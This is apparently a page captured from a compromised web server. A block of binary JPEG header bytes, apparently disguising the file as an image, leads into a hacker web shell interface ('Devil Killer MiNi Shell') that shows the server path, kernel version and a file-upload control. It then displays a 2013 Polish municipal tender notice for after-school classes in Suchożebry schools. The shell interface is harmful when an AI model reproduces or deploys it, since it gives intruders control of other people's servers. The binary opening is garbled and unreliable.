JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130905/359242-N-2013.html

<p class="kh_header"><b>Suchożebry: Przeprowadzenie zajęć dodatkowych dla dzieci ze szkół podstawowych z terenu Gminy Suchożebry w ramach projektu POKL.09.01.02-14-068/13 pt. Dajmy dzieciom szansę</b><br>
<b>Numer ogłoszenia: 359242 - 2013; data zamieszczenia: 05.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suchożebry , ul. Aleksandry Ogińskiej 11, 08-125 Suchożebry, woj. mazowieckie, tel. 0-25 63 145 15, faks 0-25 63 145 15.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć dodatkowych dla dzieci ze szkół podstawowych z terenu Gminy Suchożebry w ramach projektu POKL.09.01.02-14-068/13 pt. Dajmy dzieciom szansę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem postępowania jest usługa pn: Przeprowadzenie zajęć dodatkowych dla dzieci ze szkół podstawowych z terenu Gminy Suchożebry w ramach projektu POKL.09.01.02-14-068/13 pt. Dajmy dzieciom szansę.
Zamówienie dotyczy prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, zajęć logopedycznych, zajęć psychoedukacyjnych, zajęć dla dzieci uzdolnionych w zakresie nauk matematyczno-przyrodniczych oraz zajęć gimnastyki korekcyjnej. Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, odbywać się będą cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły (przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu).
Zajęcia prowadzone będą dla uczniów klas I - III w następujących szkołach:
1.	Szkole Podstawowej w Krynicy, Krynica 33,
2.	Szkole Podstawowej w Krześlinie, Krześlin 67,
3.	Szkole Podstawowej w Suchożebrach, Suchożebry ul. Siedlecka 6/8,

Zamówienie zostało podzielone na następujące części:
Część Nr I
Prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Krynicy. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy.
Część Nr II
Prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Krześlinie. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie.
Część Nr III
 Prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Suchożebrach. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 3 grup dzieci, łącznie 90 godz. zajęć, z czego 33 godz. będą realizowane w 2013r., a 57 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach.
Część Nr IV
Prowadzenie zajęć logopedycznych dla dzieci ze Szkoły Podstawowej w Krynicy. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 3 grup dzieci, łącznie 90 godz. zajęć, z czego 33 godz. będą realizowane w 2013r., a 57 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy.
Część Nr V
Prowadzenie zajęć logopedycznych dla dzieci ze Szkoły Podstawowej w Krześlinie. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie.
Część Nr VI
Prowadzenie zajęć logopedycznych dla dzieci ze Szkoły Podstawowej w Suchożebrach. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach.
Część Nr VII
Prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w Szkole Podstawowej w Krynicy. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy.
Część Nr VIII
Prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w Szkole Podstawowej w Krześlinie. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie.
Część Nr IX
Prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w Szkole Podstawowej w Suchożebrach. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach.
Część Nr X
 Prowadzenie zajęć psychoedukacyjnych w Szkole Podstawowej w Krynicy. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy.
Część Nr XI
Prowadzenie zajęć psychoedukacyjnych w Szkole Podstawowej w Krześlinie. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie.
Część Nr XII
 Prowadzenie zajęć dla dzieci uzdolnionych w zakresie nauk matematyczno-przyrodniczych w Szkole Podstawowej w Krynicy. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy.
Część Nr XIII
Prowadzenie zajęć dla dzieci uzdolnionych w zakresie nauk matematyczno-przyrodniczych w Szkole Podstawowej w Krześlinie. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie.
Część Nr XIV
Prowadzenie zajęć dla dzieci uzdolnionych w zakresie nauk matematyczno-przyrodniczych w Szkole Podstawowej w Suchożebrach. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach.
Część Nr XV
Prowadzenie zajęć gimnastyki korekcyjnej dla dzieci w Szkole Podstawowej w Suchożebrach. 
Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach.

3.2.Wszystkie zadania będą realizowane sukcesywnie w terminie 7 dni od podpisania umowy do dnia 26 czerwca 2014 r. Dokładne godziny zajęć zostaną uzgodnione z Wykonawcą bezpośrednio przed realizacją przedmiotu zamówienia.

Osoba prowadząca zajęcia musi posiadać następujące kwalifikacje:

Część Nr I - III, VII - IX, XII - XIV
Kwalifikacje określone dla nauczycieli klas I-III szkół podstawowych zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz.400, zm. 2012r. poz.174 i poz.426) lub odpowiadających wymogom ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. Nr 63, poz.394)

Część Nr IV - VI
Kwalifikacje określone dla nauczyciela logopedy w szkole podstawowej zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz.400, zm. 2012r. poz.174 i poz.426) lub odpowiadających wymogom ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. Nr 63, poz.394)

Część Nr X - XI
Kwalifikacje określone dla nauczyciela psychologa w szkole podstawowej zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz.400, zm. 2012r. poz.174 i poz.426) lub odpowiadających wymogom ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. Nr 63, poz.394)


Część Nr XV
Kwalifikacje do zajmowania stanowiska nauczyciela w szkole podstawowej zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz.400, zm. 2012r. poz.174 i poz.426) oraz ukończoną, co najmniej jedną formę doskonalącą dającą kwalifikacje do gimnastyki korekcyjnej lub odpowiadających wymogom ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. Nr 63, poz.394) 

3.3.Wykonawca zobowiązuje się do
a)	świadczenie usługi objętej niniejszym zamówieniem; 
b)	Przedłożenia najpóźniej w dniu podpisania umowy dokumentów nauczycieli prowadzących zajęcia potwierdzających posiadanie kwalifikacji uprawniających do prowadzenia zajęć.
c)	Niezwłocznego rozpoczęcia realizacji zajęć zgodnie z ramowym harmonogram zajęć w ramach projektu
d)	Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania zajęć.
e)	Wykonawca po zakończeniu realizacji zadania skompletuje dokumentację i przekaże ją kierownikowi projektu
f)	Wykonywania niniejszej umowy rzetelnie i solidnie, przy zachowaniu należytej staranności i dochowaniu wszelkich przyjętych standardów i obowiązujących przepisów, ze szczególnym uwzględnieniem bezpieczeństwa uczestników projektu stosownie do wymagań wynikających ze współfinansowania projektu ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013. Wykonanie przedmiotu umowy w taki sposób uprawnia Wykonawcę do roszczenia o zapłatę wynagrodzenia, a Zamawiającego zobowiązuje do zapłaty wynagrodzenia w wysokości, terminie i w sposób określony w umowie.
3.4.Nauczyciel prowadzący zajęcia jest zobowiązany do:

a)	Opracowania i realizacja programów nauczania dla zajęć oraz szczegółowych harmonogramów zajęć. Programy nauczania oraz harmonogram muszą uzyskać akceptację Zamawiającego.
b)	Prowadzenia dzienników zajęć i list obecności na zajęciach zgodnie z zasadami określonymi przez Zamawiającego,
c)	prowadzenie miesięcznych kart czasu pracy,
d)	 Dostarczenia dzienników zajęć i list obecności do kierownika projektu po zakończeniu zajęć.
e)	Sporządzenie w okresach rozliczeniowych (zgodnie z harmonogramem sporządzanych wniosków o płatność) sprawozdania w formie elektronicznej i papierowej,
f)	Poddawania się kontroli prawidłowości realizacji projektu dokonywanej przez Zamawiającego 
g)	Zachowania zasady poufności przetwarzania danych osobowych osób uczestniczących w zajęciach

3.5. Wykonawca zobowiązuje się do wykonania przedmiotu umowy z należytą starannością zgodnie z obowiązującymi przepisami, normami, na ustalonych umową warunkach oraz stosownie do wymagań wynikających ze współfinansowania projektu ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013r.

3.6. Wykonawca może złożyć ofertę na dowolną ilość CZĘŚCI. 

3.7. W przypadku wystąpienia sprzeczności w dokumentach tworzących SIWZ, wiążącą decyzję w tych sprawach podejmuje Zamawiający..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta  Wykonawcy będzie zawierać:
a)	wypełniony formularz ofertowy (zał. 1 do SIWZ),
b)	dokumenty i oświadczenia wymienione w pkt. VII Specyfikacji.
c)	zaparafowany przez Wykonawcę egzemplarz Załącznika nr 4 SIWZ pn. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego.
d)	pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, (jeśli dotyczy);
e)	Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania, których pełnomocnik jest upoważniony. Pełnomocnictwo musi być przedstawione w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, sporządzonego przez notariusza odpisu lub wyciągu  z dokumentu,  lub  kopii  poświadczonej  za zgodność z oryginałem przez mocodawcę
f)	Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy tylko Wykonawców wspólnie ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi być przedstawione w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu, lub kopii poświadczonej za zgodność z oryginałem przez mocodawcę</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający z zastrzeżeniem p. 2. dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w zakresie:
a)	wynikającym ze zmian obowiązujących przepisów prawnych,
b)	wynikających ze zmian wytycznych instytucji, która przyznała środki sfinansowane zamówieniem,
c)	będącym następstwem działania siły wyższej.
Warunkiem dokonania zmian w umowie jest zawiadomienie o zaistnieniu okoliczności wymienionych w ust.1 w formie pisemnej, a zgodę na dokonanie zmian musi wyrazić każda ze stron umowy.

2. Zmiany dotyczące wydłużenia terminu realizacji zamówienia (wykonania umowy), będą możliwe jedynie w przypadku gdy Zamawiający uzyska zgodę Instytucji Wdrażającej Programu Operacyjnego Kapitał Ludzki na lata  2007-2013  na wydłużenie terminu realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.suchozebry.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Suchożebry ul.A. Ogińskiej 11, 08-125 Suchożebry.</p>
